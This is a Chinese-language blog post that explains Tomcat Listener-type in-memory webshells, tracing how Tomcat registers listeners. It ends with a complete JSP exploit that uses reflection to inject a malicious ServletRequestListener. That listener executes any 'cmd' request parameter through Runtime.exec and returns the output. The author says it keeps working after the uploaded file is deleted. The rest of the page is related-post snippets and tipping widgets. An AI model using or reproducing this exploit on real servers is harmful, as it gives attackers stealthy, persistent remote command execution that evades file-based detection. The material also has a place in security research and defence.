Listener内存马

于 2023-10-07 16:20:09 发布
阅读量63 收藏
点赞数
文章标签: 网络安全 web安全 安全 计算机网络 系统安全 安全架构 网络攻击模型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MachineGunJoe/article/details/133643790
版权

0x01 什么是Listener内存马

什么是Listener

和 Filter 一样,监听器是 JavaWeb 三大组件之一。它是一个实现特定接口的java程序,这个程序用于监听web应用中的一些对象,信息的创建,添加,销毁等,然后针对于这些情况做出相应处理。总结来说,就是在application,session,request三个对象创建消亡或者往其中添加修改删除属性时自动执行代码的功能组件。

Listener的三大域对象

监听器有三个域对象,指的是在监听器中可以访问的特定范围内的数据对象。分别为

ServletContext域对象——用于在整个 Java Web 应用程序中共享数据、资源和配置信息。

ServletRequest域对象——用于在一次 HTTP 请求处理期间共享数据和信息。

HttpSession域对象——用于在用户会话期间存储和共享数据,跨足够长的时间间隔保持信息状态。

根据不同域对象的功能,很明显 ServletRequest 类型是适合注入内存马的,我们注入一个有恶意代码的ServletRequest类型的监听器,当有HTTP请求处理时,注入的监听器就会发挥作用,执行恶意代码,这就是Listener内存马。

0x02 代码实现

创建一个ServletRequest类型的监听器,继承 ServletRequestListener 接口,需要重写requestInitialized方法,和过滤器的doFilter方法一样,requestInitialized方法也是处理监听器业务的方法。

package Listener;

import javax.servlet.ServletRequestEvent;
import javax.servlet.ServletRequestListener;

public class MyListener implements ServletRequestListener {
@Override
public void requestInitialized(ServletRequestEvent sre){
System.out.println("Listener被执行");

}
}

代码很短,只用作测试,同时需要修改 web.xml 配置文件。

<listener>
<listener-class>Listener.MyListener</listener-class>
</listener>

启动服务器。

1.png

可以在日志中看到输出信息,监听器被调用,requestInitialized方法被执行。

0x03 流程分析

想要成功注册Listener内存马,必须要了解Listener的生成以及调用

读取配置文件

在应用启动的时候,ContextConfig 类首先会去读取配置文件,主要方法是configureContext,在这个方法下个断点.

3.png

首先确定 Servlet 上下文的配置信息,然后会遍历这个xml配置文件里的Filter和Listener,这里遍历到MyListener这个监听器,然后调用 StandardContext 的 addApplicationListener 方法,跟进。

4.png

在这之前做一些检查,检查是否存在相同的监听器,然后整合起来,把它赋值为 applicationListeners 数组里,到这调试就结束,只要知道解析完web.xml里的Listener后,会把解析完的监听器添加到applicationListeners 数组里就够了。

Listener被调用

读取配置文件之后,StandardContext 会首先调用 listenerStart 方法,经过一些检查,然后开启监听。

断点不能直接下在requestInitialized方法里,因为流程差不多调用完了,没东西了。把断点下在StandardContext类的fireRequestInitEvent方法里。

2.png

开始调试。

5.png

跟进 getApplicationEventListeners 方法。

6.png

获取存放监听器的数组,查找用法,看看什么地方调用了 applicationEventListenersList。

7.png

这个方法是将监听器放进这个数组里,继续往下看。

8.png

对监听器数组进行遍历,判断是否继承了 ServletRequestListener 接口,最终调用 requestInitialized 方法,到此分析流程结束。

0x04 攻击思路与exp编写

回想分析流程,遍历监听器数组,然后调用,我们的目标是将自己构造的Listener添加到数组中去,也就是 addApplicationEventListener 方法,通过反射将恶意的Listener添加进去。还是首先构造上下文,也就是 StandardContext 通过执行流找到上下文生成的地方。

9.png

这里通过 request 对象来创建,JSP内置了request对象,通过反射构造 StandardContext 对象。

ServletContext servletContext =  request.getServletContext();  
Field applicationContextField = servletContext.getClass().getDeclaredField("context");  
applicationContextField.setAccessible(true);  
ApplicationContext applicationContext = (ApplicationContext) applicationContextField.get(servletContext);  

Field standardContextField = applicationContext.getClass().getDeclaredField("context");  
standardContextField.setAccessible(true);  
StandardContext standardContext = (StandardContext) standardContextField.get(applicationContext);

然后编写一个恶意的Listener,最终写个jsp,完整exp(贴上师傅代码)。

<%@ page import="org.apache.catalina.core.StandardContext" %>  
<%@ page import="java.util.List" %>  
<%@ page import="java.util.Arrays" %>  
<%@ page import="org.apache.catalina.core.ApplicationContext" %>  
<%@ page import="java.lang.reflect.Field" %>  
<%@ page import="java.util.ArrayList" %>  
<%@ page import="java.io.InputStream" %>  
<%@ page import="org.apache.catalina.connector.Request" %>  
<%@ page import="org.apache.catalina.connector.Response" %>  
<%!  

class ListenerMemShell implements ServletRequestListener {  

@Override  
public void requestInitialized(ServletRequestEvent sre) {  
String cmd;  
try {  
cmd = sre.getServletRequest().getParameter("cmd");  
org.apache.catalina.connector.RequestFacade requestFacade = (org.apache.catalina.connector.RequestFacade) sre.getServletRequest();  
Field requestField = Class.forName("org.apache.catalina.connector.RequestFacade").getDeclaredField("request");  
requestField.setAccessible(true);  
Request request = (Request) requestField.get(requestFacade);  
Response response = request.getResponse();  

if (cmd != null){  
InputStream inputStream = Runtime.getRuntime().exec(cmd).getInputStream();  
int i = 0;  
byte[] bytes = new byte[1024];  
while ((i=inputStream.read(bytes)) != -1){  
response.getWriter().write(new String(bytes,0,i));  
response.getWriter().write("\r\n");  
}  
}  
}catch (Exception e){  
e.printStackTrace();  
}  
}  
}  
%>  

<%  
//获取standardContext上下文
ServletContext servletContext =  request.getServletContext();  
Field applicationContextField = servletContext.getClass().getDeclaredField("context");  
applicationContextField.setAccessible(true);  
ApplicationContext applicationContext = (ApplicationContext) applicationContextField.get(servletContext);  

Field standardContextField = applicationContext.getClass().getDeclaredField("context");  
standardContextField.setAccessible(true);  
StandardContext standardContext = (StandardContext) standardContextField.get(applicationContext);  

Object[] objects = standardContext.getApplicationEventListeners();  
List<Object> listeners = Arrays.asList(objects);  
List<Object> arrayList = new ArrayList(listeners);  
arrayList.add(new ListenerMemShell());  
standardContext.setApplicationEventListeners(arrayList.toArray());  

%>

上传jsp文件。

10.png

成功执行,即使文件删除,仍然可以执行命令。

我是黑客
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Java Tomcat内存——Listener内存
m0_61506558的博客
12-01 796
监听器 Listener 是一个实现特定接口的 Java 程序,这个程序专门用于监听另一个 Java 对象的方法调用或属性改变,当被监听对象发生上述事件后,监听器某个方法将立即自动执行。事件:方法调用、属性改变、状态改变等。事件源:被监听的对象( 例如:request、session、servletContext)。监听器:用于监听事件源对象 ,事件源对象状态的变化都会触发监听器。注册监听器:将监听器与事件源进行绑定监听对象创建和销毁的监听器监听对象中属性变更的监听器。
深入底层源码的Listener内存(内存系列篇三)
m0_71746299的博客
01-27 296
写在前面 继前面的Filter``Servlet内存技术,这是系列文章的第三篇了,这篇将给大家带来的是Listener内存技术。 前置 什么是Listener? 监听器 Listener 是一个实现特定接口的 Java 程序,这个程序专门用于监听另一个 Java 对象的方法调用或属性改变,当被监听对象发生上述事件后,监听器某个方法将立即自动执行。 监听器的相关概念: 事件:方法调用、属性改变、状态改变等。 事件源:被监听的对象( 例如:request、session、servletContext)。
[Java安全]—Tomcat Listener内存
Sentiment的博客
07-14 3201
内存,也被称为无文件,是无文件攻击的一种常用手段。而无文件攻击呢顾名思义就是不利用shell文件进行攻击,但这里的无文件并不是真的意义上的“无文件”,而是一种攻击思路,是将恶意文件内容以脚本形式存在计算机中的内存、注册表子项目中或者利用系统合法工具以逃避安全检测的方法。servlet-api类○ listener型○ filter型○ servlet型spring类○ 拦截器○ controller型Java Instrumentation类○ agent型顾名思义就是监听器,他能够监听一些事件从而来达
Tomcat-Listener内存
01-15 314
这篇文章记录下学习 Listener 内存学习到的东西,思路跟 Filter 型内存差不多,找一个相对通用的 Listener ,这里用的是 `ServletRequestListener` ,所有的 servlet 请求都会经过这个 Listener,接下来写一个例子调试分析 Listener 的注册过程和调用过程,相对来说比较简单!
S07-tomcat之Listener内存1
08-03
Listener的介绍tomcat 中 Listener 分为两类, org.apache.catalina.LifecycleListener 以及 java
Tomcat容器攻防笔记之Listener内存 .pdf
09-05
Tomcat容器攻防笔记之Listener内存 安全防护 APT 安全防护 威胁情报 安全体系
详解JavaWeb中的 Listener
09-01
JavaWeb里面的listener是通过观察者设计模式进行实现的。下面通过本文给大家详细介绍javaweb中的listener,感兴趣的朋友一起看看吧
listener-tnsname
09-09
listener-tnsnamelistener-tnsnamelistener-tnsnamelistener-tnsnamelistener-tnsnamelistener-tnsnamelistener-tnsnamelistener-tnsname
Listener知识
12-26
Oracle数据库listener相关知识!数据库管理员经常在监听器故障烦恼!
Tomcat Java内存 listener
qq_40710190的博客
07-20 245
针对Tomcat Listener内存
Tomcat内存学习3:Listener
weixin_43263451的博客
07-24 448
上一篇讲了servlet型内存,而这次这个Listener内存也是大同小异,就是在内存中恶意创建一个Listener供攻击者使用必须搞懂Listener的加载机制在此加载机制基础上,设计出Listener内存poc。
引入tomcat_Tomcat容器攻防笔记之Listener内存
weixin_35348182的博客
01-09 813
欢迎光临鲸落的杂货铺原文首发于安全客-安全资讯平台https://www.anquanke.com/post/id/226769(图自喜欢的古风插画家:微博@伊吹鸡腿子)背景: 基于现阶段红蓝对抗强度的提升,诸如WAF动态防御、态势感知、IDS恶意流量分析监测、文件多维特征监测、日志监测等手段,能够及时有效地检测、告警甚至阻断针对传统通过文件上传落地的Webshell或...
今天,咱不讲三国,就聊聊Shiro的反序列化漏洞,以及内存技术!
localhost01
07-15 7643
Shiro反序列化漏洞 漏洞介绍 上图为Shiro默认的登录页面,页面可见:Shiro提供了记住我(RememberMe)的功能。 然而,Shiro对rememberMe的cookie做了加密处理,shiro在CookieRememberMeManaer类中将cookie中rememberMe字段内容分别进行:序列化、AES加密、Base64编码,三个操作。 而在识别身份的时候,则需要对Cookie里的rememberMe字段进行逆操作: Base64解码 AES解密 反序列化 由于AES加密的密钥K
学习了解内存,看这篇就够了!(精华版)
热门推荐
MachineGunJoe666
06-21 1万+
目录 介绍: 一、内存简介 1.1 webshell变迁 1.2 如何实现webshell内存 1.3 内存类型 二、背景知识 2.1 Java web三大件 2.2Tomcat 2.3 其他java背景知识 三、内存实现 四、内存检测与排查 4.1源码检测 4.2 内存排查 介绍: 内存,也被称为无文件,是无文件攻击的一种常用手段。虽然由来已久,但是在此之前并未“大红大紫”。近年来盛行于攻防演练之中,攻防演练从2016年的几家参演单位,到2020年扩充到..
Java笔试面试之JVM与内存
Listener_yjt的博客
03-21 355
以下是笔者总结的Java笔试面试题中JVM与内存部分,答案为笔者自己总结得出,未必完全正确,仅供参考 1.JVM的作用 用于运行Java程序,进行垃圾回收和内存分配 2.JDK和JRE的区别是什么 JRE是Java运行环境,由JVM,核心内库和支持文件组成。JDK是Java开发工具包,由JRE、编译器和其它工具组成,可以让开发者开发、编译、执行Java应用程序 3.JVM的内存组成 (1) 共...
java内存分析集合
hongduilanjun的博客
04-04 5287
基于tomcat Servlet内存 web.xml <?xml version="1.0" encoding="UTF-8"?> <web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
『Java安全』Tomcat内存_动态注册Listener内存
Ho1aAs‘s Blog
03-24 1805
『Java安全』反序列化- 文章目录前言Tomcat Servlet API Listener介绍ServletRequestListener介绍ServletRequestListener调用流程分析1. Request创建时2. Request销毁时Listener内存原理Ⅰ.获取contextⅡ. 生成恶意Listener获取ResponseⅢ. add添加listener完整代码参考引用完 前言 Tomcat Servlet API Listener介绍 Listener监听器用来监听对象创建、销
RabbitMQListener
最新发布
12-23
RabbitMQListener是一个用于在RabbitMQ消息队列中监听消息的注解。它可以被应用于方法或类上,用于指定要监听的队列和处理消息的方法。 以下是RabbitMQListener的使用示例: 1. 在方法上使用RabbitMQListener注解...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

我是黑客

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值